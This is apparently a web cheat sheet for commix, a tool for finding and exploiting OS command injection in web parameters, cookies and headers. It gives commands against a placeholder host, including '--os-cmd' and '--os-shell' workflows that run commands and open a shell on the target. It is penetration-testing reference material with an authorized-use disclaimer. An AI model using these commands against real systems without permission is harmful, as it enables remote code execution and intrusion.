CyberCheatsheets

commix Cheat Sheet

Automated command injection detection and exploitation in web parameters and headers.

Web Application Securitycommand-injectionos-shellrceUpdated 2026-06-02

Overview

commix (Command Injection Exploiter) finds and exploits OS command injection in GET/POST parameters, cookies, and User-Agent. Pair with parameter discovery (Arjun, ParamSpider) and manual fuzzing on authorized apps.

Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.

Install

sudo apt install -y commix

or

git clone https://github.com/commixproject/commix.git
cd commix && python commix.py -h

Essential commands

Basic URL test

python commix.py -u "http://target.example/ping?host=127.0.0.1" --batch

POST data

python commix.py -u "http://target.example/api" --data="host=127.0.0.1" --batch

Cookie injection point

python commix.py -u "http://target.example/" --cookie="session=1" --batch

Common workflows

Enumerate and get shell —

python commix.py -u "http://target.example/exec?cmd=whoami" --batch --level=3
python commix.py -u "http://target.example/exec?cmd=whoami" --os-cmd="id" --batch
python commix.py -u "http://target.example/exec?cmd=whoami" --os-shell --batch

Burp request file —

python commix.py -r request.txt --batch
python commix.py -r request.txt -p cmd --batch --level=3

Blind / time-based confirmation —

python commix.py -u "http://target.example/ping?host=127.0.0.1" --time-sec=5 --batch
python commix.py -u "http://target.example/ping?host=127.0.0.1" --technique=time --batch

Through proxy and with tamper —

python commix.py -u "http://target.example/ping?host=1" --proxy="http://127.0.0.1:8080" --batch
python commix.py -u "http://target.example/ping?host=1" --tamper=space2ifs --batch

Flags reference

-u URL

Target URL

-r FILE

HTTP request file

--data

POST body

--cookie

Cookie string

-p PARAM

Vulnerable parameter

--batch

Non-interactive

--level=1-3

Test thoroughness

--os-cmd=CMD

Run single OS command

--os-shell

Pseudo-TTY shell

--technique

Injection technique filter

--time-sec=N

Time-based delay

--proxy=URL

HTTP proxy

--user-agent=UA

Custom User-Agent

--tamper=SCRIPT

Payload encoding script

--all

Test all parameters

Tips

  • Command injection often appears in ping, traceroute, image conversion, and backup features—prioritize those parameters.
  • Use --proxy with Burp to inspect payloads before sending at higher levels.
  • Blind injection: confirm with --time-sec before --os-shell.
  • Windows targets may need different separators; commix auto-detects when possible.

References

Aide-mémoires similaires